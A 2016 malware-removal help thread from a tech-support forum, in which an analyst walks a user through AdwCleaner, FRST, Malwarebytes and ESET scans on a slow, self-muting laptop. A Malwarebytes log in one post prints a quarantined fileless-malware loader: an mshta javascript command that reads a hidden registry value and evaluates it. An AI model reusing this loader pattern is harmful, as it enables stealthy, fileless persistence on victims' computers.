Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help > Resolved HJT Threads

User Tag List

sent from Windows 8.1 Forum

This is a discussion on sent from Windows 8.1 Forum within the Resolved HJT Threads forums, part of the Tech Support Forum category. HP Envy 15" DV7 Started about a month ago...and I'm almost certain it followed a Windows Update. I have this


 
 
Thread Tools Search this Thread
Old 11-01-2016, 01:39 PM   #1
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



HP Envy 15" DV7 Started about a month ago...and I'm almost certain it followed a Windows Update.
I have this computer set to download but ask me what updates to install...I didn't want any part of Windows 10.
(Considering the cost of every Windows Operating System since the beginning, the fact they were giving it away for free should have caused some questions in anyone's mind)

But I digress.

No matter where I set volume...almost immediately the MUTE light comes on over the f6 key which is "mute"...I turn the volume back up, and poof...muted again.
Playing something with sound is not required to make it drop to MUTE.
It will happen, on it's own, anywhere from 30 seconds to five minutes later but it IS going to happen every time.

There are a few "solutions" out there. Mostly involving going through Device Manager, opening the sound and then unchecking "allow programs to control this device" or something like that...doesn't matter...changes nothing.
There is no "adjustment" I can make to fix this.

If Microsatan came up with a patch to fix it, it's not been downloaded to my computer yet.

None of the "fixes" I've seen online fix anything.

The person who answered on the other board said...malware.
Malware Bytes sees nothing. Chameleon sees nothing. Stumped
grumpops is offline  
Sponsored Links
Advertisement
 
Old 11-01-2016, 07:14 PM   #2
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



This is Win 8.1 and DDS/Combo Fix won't run on it.
"this program not designed to run in Compatibility mode"
But nothing is in compatibility mode.

Went looking and found that neither program (only trying to run DDS of course) will work on an 8.1 machine
grumpops is offline  
Old 11-02-2016, 01:19 PM   #3
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



Are there other alternatives to DDS or something that wil run on 8.1?
grumpops is offline  
Sponsored Links
Advertisement
 
Old 11-04-2016, 02:17 AM   #4
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello grumpops,

My name is Tolga and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Please download to and run all requested tools from your Desktop.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the computer is clean.
My native language is not english. So please do not use slang or idioms. It could be hard for me to read. Thanks for your understanding.

Now, let's get started, shall we? Please do the below steps.

STEP 1

Please download AdwCleaner from here and save it to your desktop.

Click the green 'Download now @bleepingcomputer' button.
Run AdwCleaner and select Scan
Once the Scan is done, select Clean
Once done it will ask to reboot, please allow the reboot.
On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[C#].txt
Please copy/paste the contents of the log in your next reply.

STEP 2

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system.
If you are not sure which version applies to your system download both of them and try to run them.
Only one of them will run on your system, that will be the right version.


Double-click to run it. When the tool opens click Yes to the disclaimer.
Make sure the Addition.txt button is ticked.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

=========================================================

Things I need to see in your next post:

  • AdwCleaner[C#].txt
  • FRST.txt
  • Addition.txt
__________________
tekir06 is offline  
Old 11-18-2016, 09:50 AM   #5
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



I've been Away a few weeks. Will run these today
grumpops is offline  
Old 11-18-2016, 10:36 AM   #6
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



Ran the scans.
Odd that Adwcleaner says it's part of Malwarebytes but, Malwarebytes didn't see what Adwcleaner did.

Here are the logs.
FRST and ADDITION attached.
The contents of the Adwcleaner scan:

# AdwCleaner v6.030 - Logfile created 18/11/2016 at 0952
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-18.1 [Server]
# Operating System : Windows 8.1 (X64)
# Username : Sal - SALMUSIC
# Running from : C:\Users\Sal\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : hxxps://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\Program Files (x86)\deal4real
[-] Folder deleted: C:\ProgramData\Savinshoop
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Savinshoop
[-] Folder deleted: C:\Program Files (x86)\Savinshoop
[-] Folder deleted: C:\ProgramData\surefkeepIt
[#] Folder deleted on reboot: C:\ProgramData\Application Data\surefkeepIt
[-] Folder deleted: C:\Program Files (x86)\surefkeepIt
[-] Folder deleted: C:\ProgramData\websaavEr
[#] Folder deleted on reboot: C:\ProgramData\Application Data\websaavEr
[-] Folder deleted: C:\Program Files (x86)\websaavEr
[-] Folder deleted: C:\ProgramData\FLoeixiBleeSHopper
[#] Folder deleted on reboot: C:\ProgramData\Savinshoop
[#] Folder deleted on reboot: C:\ProgramData\surefkeepIt
[#] Folder deleted on reboot: C:\ProgramData\websaavEr
[-] Folder deleted: C:\Users\Sal\AppData\Local\Downloaded Installers
[-] Folder deleted: C:\ProgramData\slimware utilities inc
[#] Folder deleted on reboot: C:\ProgramData\SlimWare Utilities Inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\slimware utilities inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\SlimWare Utilities Inc
[-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers
[-] Folder deleted: C:\Program Files (x86)\driverupdate
[#] Folder deleted on reboot: C:\Program Files (x86)\DriverUpdate


***** [ Files ] *****

[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\ZQ7HR435\mywebface[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\PY8A573L\pt.gamingwonderland[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\OFW6FLM8\gamingwonderland[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\OFW6FLM8\myway[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\G3ZSKGLT\iwon[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\G3ZSKGLT\www.zwinky[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\92RX7NS0\citysearch[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\92RX7NS0\www.astrology[1].xml
[-] File deleted: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\8TAGHT51\www.fromdoctopdf[1].xml
[-] File deleted: C:\Users\Sal\AppData\Roaming\appdataFr2.bin
[-] File deleted: C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ogminpmldncgcmokldnmmapddoccmhfl_0.localstorage
[-] File deleted: C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ogminpmldncgcmokldnmmapddoccmhfl_0.localstorage-journal


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\astrology.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\citysearch.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\fromdoctopdf.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\gamingwonderland.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\iwon.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\myway.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\mywebface.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\Astrology.com - Horoscopes, Tarot, Psychic Readings
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\zwinky.com
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{3C99BB60-C534-2DE2-B8DB-8A4EAB415BA9}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{3C99BB60-C534-2DE2-B8DB-8A4EAB415BA9}
[-] Key deleted: HKLM\SOFTWARE\Classes\saVinshOp.saVinshOp
[-] Key deleted: HKLM\SOFTWARE\Classes\saVinshOp.saVinshOp.2.3
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{46cae59d-eb46-44e3-997a-a1bdaecba464}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{46cae59d-eb46-44e3-997a-a1bdaecba464}
[-] Key deleted: HKLM\SOFTWARE\Classes\.
[-] Key deleted: HKLM\SOFTWARE\Classes\..9
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{C6FCA84D-A21F-B5AE-13B0-30F9F066FBDE}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{C6FCA84D-A21F-B5AE-13B0-30F9F066FBDE}
[-] Key deleted: HKLM\SOFTWARE\Classes\surfkEepiit.surfkEepiit
[-] Key deleted: HKLM\SOFTWARE\Classes\surfkEepiit.surfkEepiit.8.1
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E751B8A7-E516-DDEA-DAF1-97BFB88312D2}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{E751B8A7-E516-DDEA-DAF1-97BFB88312D2}
[-] Key deleted: HKLM\SOFTWARE\Classes\wwebsavveRR.wwebsavveRR
[-] Key deleted: HKLM\SOFTWARE\Classes\wwebsavveRR.wwebsavveRR.6.2
[-] Key deleted: HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKU\S-1-5-19\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKU\S-1-5-20\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKU\S-1-5-21-247796325-2175392743-1638911745-1001\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: HKU\S-1-5-21-247796325-2175392743-1638911745-1001\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[#] Key deleted on reboot: HKU\S-1-5-18\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[#] Key deleted on reboot: HKCU\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key deleted: HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Key deleted: HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2FA77785-00C3-A920-6452-D4FE5C9C129F}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{594FD08C-0622-F9B8-CB02-7C1355D33CB8}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70BD2558-27DA-8B02-02D0-D8704ECD2EDF}
[#] Key deleted on reboot: [x64] HKCU\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\4yendex.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\4yendex.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\babylonbee.com


***** [ Web browsers ] *****

[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: mallpejgeafdahhflmliiahjdpgbegpk
[-] [C:\Users\Sal\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ogminpmldncgcmokldnmmapddoccmhfl


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [8284 Bytes] - [18/11/2016 0952]
C:\AdwCleaner\AdwCleaner[S0].txt - [7918 Bytes] - [18/11/2016 09:05:24]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [8430 Bytes] ##########
Attached Files
File Type: txt FRST.txt (33.4 KB, 13 views)
File Type: txt Addition.txt (48.8 KB, 12 views)
grumpops is offline  
Old 11-21-2016, 03:58 AM   #7
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello grumpops,

Your Chrome browser has been changed into the Development Build. This greatly lowers the security of the browser and allows malware to install any extension it pleases. We need to resolve this.

1. If you have bookmarks, let's save them by exporting them - Export Bookmarks
2. Then I need you to go Google Sync and sign into your account
3. Scroll down until you see the "Stop and Clear" button and click on the button. At the prompt click on "Ok"
4. Now we need to uninstall chromevia the Control Panel.
Note: When asked about user data or settings you must remove this also, so please check the box.
5. Restart the computer and reinstall chrome, You can download The latest version from here - Google Chrome
6. Import your bookmarks back into Chrome.
7. Sign back in to your Chrome browser so that your bookmarks sync with your online account.

Please let me know when this is complete.
__________________
tekir06 is offline  
Old 11-21-2016, 09:33 AM   #8
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



Chrome not that important.
So rather than do all that I just uninstallted it.
Much faster and I really don't need Chrome.

I have Safari, IE, and Firefox on here..
grumpops is offline  
Old 11-21-2016, 10:08 AM   #9
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



I took too long and couldn't add this (Edit dies after 15 minutes)
I ran the scans again after removing Chrome

# AdwCleaner v6.030 - Logfile created 21/11/2016 at 09:42:55
# Updated on 19/10/2016 by Malwarebytes
# Database : 2016-11-20.1 [Server]
# Operating System : Windows 8.1 (X64)
# Username : Sal - SALMUSIC
# Running from : C:\Users\Sal\Desktop\AdwCleaner.exe
# Mode: Scan
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

No malicious services found.


***** [ Folders ] *****

No malicious folders found.


***** [ Files ] *****

File Found: C:\Users\Sal\AppData\Local\Microsoft\Internet Explorer\DOMStore\OFW6FLM8\myway[1].xml


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

No malicious task found.


***** [ Registry ] *****

No malicious registry entries found.


***** [ Web browsers ] *****

No malicious Firefox based browser items found.
No malicious Chromium based browser items found.

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [8529 Bytes] - [18/11/2016 0952]
C:\AdwCleaner\AdwCleaner[S0].txt - [7918 Bytes] - [18/11/2016 09:05:24]
C:\AdwCleaner\AdwCleaner[S1].txt - [1195 Bytes] - [21/11/2016 09:42:55]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1268 Bytes] ##########
Attached Files
File Type: txt Addition 1.txt (46.0 KB, 11 views)
File Type: txt FRST.txt (30.8 KB, 10 views)
grumpops is offline  
Old 11-22-2016, 12:12 AM   #10
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello grumpops,

Ok. Please do the following.

Open Notepad (Start > All Programs > Accessories > Notepad).
Please copy all the text in the codebox below. (To do this highlight the contents of the box, right-click on it and select Copy. Right-click in the open Notepad and select Paste).
Save it as fixlist.txt next to FRST.exe

NOTE: Both FRST64.exe and the fixlist.txt must be in the same location or the fix will not work.

Code:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-247796325-2175392743-1638911745-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
RemoveProxy:
CMD: bitsadmin /reset /allusers
EmptyTemp:
Double-click FRST to run the tool. If the tool warns you the version is outdated, please download and run the updated version.
Click the Fix button just once, and wait.
If you receive a message that a reboot is required, please make sure you allow it to restart normally.
The tool will complete its run after the restart.
When finished, the tool will make a log (Fixlog.txt) in the same location from where it was run. Please post the Fixlog.txt log in your reply.


NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
__________________
tekir06 is offline  
Old 11-22-2016, 10:50 AM   #11
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



Here's the Fixlog.
System still runs very slow and the sound still mutes before playing any sound.

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-11-2016 01
Ran by Sal (22-11-2016 10:12:22) Run:1
Running from C:\Users\Sal\Desktop\Virus logs
Loaded Profiles: Sal (Available Profiles: Sal)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-247796325-2175392743-1638911745-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
RemoveProxy:
CMD: bitsadmin /reset /allusers
EmptyTemp:
*****************

Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully
HKU\S-1-5-21-247796325-2175392743-1638911745-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.7.9600 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 133042806 B
Java, Flash, Steam htmlcache => 47570 B
Windows/system/drivers => 372281647 B
Edge => 0 B
Chrome => 0 B
Firefox => 377420875 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 81062 B
systemprofile32 => 128 B
LocalService => 677842 B
NetworkService => 110216 B
Sal => 1854192113 B

RecycleBin => 33377960168 B
EmptyTemp: => 33.6 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 10:30:32 ====
grumpops is offline  
Old 11-22-2016, 02:55 PM   #12
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



I also ran Malwarebytes again and this time, it found two rootkits and a Trojan.
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/22/2016
Scan Time: 1:26 PM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.22.13
Rootkit Database: v2016.11.20.01
License: Premium
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: Sal

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 326170
Time Elapsed: 1 hr, 20 min, 22 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 1
Rootkit.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001_Classes\5FA8EB45\SHELL\OPEN\COMMAND, Quarantined, [e570a61d3e5c93a3bfa9ac2f2cd6ec14],

Registry Values: 2
Trojan.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^rsifhfegrs, Quarantined, [d28360636d2dad890960e9f43bc7d32d],
Rootkit.Fileless.MTGen, HKU\S-1-5-21-247796325-2175392743-1638911745-1001_Classes\5fa8eb45\SHELL\OPEN\COMMAND, "C:\WINDOWS\system32\mshta.exe" "javascript:FSaPhuR6="m7SehM";G16Z=new ActiveXObject("WScript.Shell");IBt88ep="tk8";Um0Et6=G16Z.RegRead("HKCU\\software\\pkrixidtpk\\slobryn");wclv3s5q="a7";eval(Um0Et6);n8lQW="ftH";", Quarantined, [e570a61d3e5c93a3bfa9ac2f2cd6ec14]

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 1
Rootkit.Fileless.MTGen, C:\Users\Sal\AppData\Local\e99d7f6e\eb9f040c.bat, Quarantined, [69ecd5ee61396dc9af351b7c5ea507f9],

Physical Sectors: 0
(No malicious items detected)


(end)
grumpops is offline  
Old 11-22-2016, 06:37 PM   #13
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



One last note.
After running MalwareBytes premium one last time, (The log above)
The sound issue appears to be gone...I can play a video all the way through.
However, it's still very slow...and there are times when I just get the cursor "hand" and can't do anything for 30 seconds to a minute.
When typing, it will lose the characters...I can continue typing. Eventually it will appear on the screen.
grumpops is offline  
Old 11-24-2016, 11:04 PM   #14
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello grumpops,

Ok. Please do the following.

Go here and click 'SCAN NOW' under 'ESET Online Scanner' to check for remnants.

You will be prompted to download and install esetonlinescanner_enu.exe. Click on the link and save the file to a convenient location.
Double-click on esetonlinescanner_enu.exe to install and a new window will open. Follow the prompts.
Turn off the real-time scanner of any existing antivirus program before performing the online scan. Here's how
At the bottom of the Terms of use window, tick the option Download latest version of ESET Online Scanner then click Accept
When/if prompted by UAC, 'Do you want to allow this app to make changes to your PC?', please choose Yes
Tick the option Enable detection of potentially unwanted applications
Click on Advanced settings
Make sure that the option Clean threats automatically is unticked.
Ensure these options are ticked:
  • Enable detection of potentially unsafe applications
  • Enable detection of suspicious applications
  • Scan archives
  • Enable Anti-Stealth technology

Click Scan
Wait for the scan to finish.
When the scan is done, if it shows a screen that says Threats found, click Save to text file... then name it and save it to your desktop.
Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
Please copy/paste the contents of the log in your next reply.
To close ESET Online Scanner, select Do not clean then Finish
__________________
tekir06 is offline  
Old 11-26-2016, 11:22 AM   #15
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



ESET ran, for 7 hours, found nothing,. and offered no file to save.
At this point the compute is headed to a landfill.
All I can use it for is a doorstop. This post has taken 20 minutes to type nothing happens when I type.
grumpops is offline  
Old 11-27-2016, 09:09 AM   #16
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



everything is just SLOW, For example, click on this box to type.
The cursor will appear, eventually...but when I start to type nothing happens...I typed this entire line seeing nothing on the screen...it appeard about 20 seconds later
grumpops is offline  
Old 11-28-2016, 03:09 AM   #17
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello again,

Please re-run FRST tool and attach fresh FRST.txt and Addition.txt.
__________________
tekir06 is offline  
Old 11-28-2016, 02:10 PM   #18
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



Thank you
I've attached, per your request, both the FRST.TXT and ADDITION logs.
Attached Files
File Type: txt FRST 11 28.txt (31.4 KB, 12 views)
File Type: txt Addition 11 28.txt (47.9 KB, 13 views)
grumpops is offline  
Old 11-30-2016, 12:57 AM   #19
Security Team
Analyst
 
tekir06's Avatar
 
Join Date: Oct 2010
Location: Turkiye
Posts: 1,859
OS: Windows 7 (32 Bit)



Hello grumpops,

Please do the following.

Download CKScanner by askey127 from Here
Right-click and Run as Administrator CKScanner.exe then click Search For Files
After a couple minutes or less, when some text appears in the box, click Save List To File.
A message box will verify the file saved. It is important that you run the program just once..
Double-click the CKFiles.txt icon on your desktop, give permission if asked, and copy/paste the contents in your next reply.
__________________
tekir06 is offline  
Old 11-30-2016, 02:07 PM   #20
Registered Member
 
Join Date: Mar 2007
Location: 60 Mi South of Seattle
Posts: 170
OS: i7 Quad core, 8GB DDR3, 1Tb SATA, Win 7 64 Bit



CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\program files\presonus\studio one 2\extensions\fatchannel\presets\drum\snare crackalak.dsppreset
c:\program files\presonus\studio one 3\presets\presonus\fat channel\drum\snare crackalak.dsppreset
c:\users\sal\documents\presonus\audioboxvsl\library\ab44\fat\drm_snarecrackalak.xml
c:\users\sal\documents\presonus\audioboxvsl\library\fat\drm_snarecrackalak.xml
scanner sequence 3.BB.11.MXAPFZ
----- EOF -----

Presonus files are all important...it's my DAW (Digital Audio Workstation) for doing tracks for my Casino band.
AudioBox is the drivers for the Digital Interface between the DAW and my PA system.
grumpops is offline  
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Similar Threads
Thread Thread Starter Forum Replies Last Post
ESET threats
In earlier message, and in continuation of another thread on another conmuter I started a thread stating that having tried ESET it had found a number of threats which i will mention at the end. meanwhile I ran DDS abnd will add the the logs. Gmer found rootkit activity but when I ran the scan on...
qimqim Inactive Malware Help Topics 13 12-13-2013 07:22 PM
Computer runing to slow.
My comp HP Pavilion a1 123c opens any application or software slowly and internet sites also slow. OS X pro service pack3. System32. Total Physical Memory 1024 Mb. Available Ph. Mem.50.05Mb Total Virtual Mem. 2.00GB. Available Virtual Mem. 1.96Gb. I used AVG, Super antivirus free edition,...
Val852 Resolved HJT Threads 3 07-22-2013 07:35 PM
Virus blocking internet access.
After removing XP Antispyware 2012,I can no longer connect to the internet.It just says "acquiring network address". When I do ipconfig it says "RPC server is unavailable".There's nothing wrong with the internet connection itself.Just something on my computer preventing it from connecting. ....
honeybe Resolved HJT Threads 28 01-10-2012 02:26 AM

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
